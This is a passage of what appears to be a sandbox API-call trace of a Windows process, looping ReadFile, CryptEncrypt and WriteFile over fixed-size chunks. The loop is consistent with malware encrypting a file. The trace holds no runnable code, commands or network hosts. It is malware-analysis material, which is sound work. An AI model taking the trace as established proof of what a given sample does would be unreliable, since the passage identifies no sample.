pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.925] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.925] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.925] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.925] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.925] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.925] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.925] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.926] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.926] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.926] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.926] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.926] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.926] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.926] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.926] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.926] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.926] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.926] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.926] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.926] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.926] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.927] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.927] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.927] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.927] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.927] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.927] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.927] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.927] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.927] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.927] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.927] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.927] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.927] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.928] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.928] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.928] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.928] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.928] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.928] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.928] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.928] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.928] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.928] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.929] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.929] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.929] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.929] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.929] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.929] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.929] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.929] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.929] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.929] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.929] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.929] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.929] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.929] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.930] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.930] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.930] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.930] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.930] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.930] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.930] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.930] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.930] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.930] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.930] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.930] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.930] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.931] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.931] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.931] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.931] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.931] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.931] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.931] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.931] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.931] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.932] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.932] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.932] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.932] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.932] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.932] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.932] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.932] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.932] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.933] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.933] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.933] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.933] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.933] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, 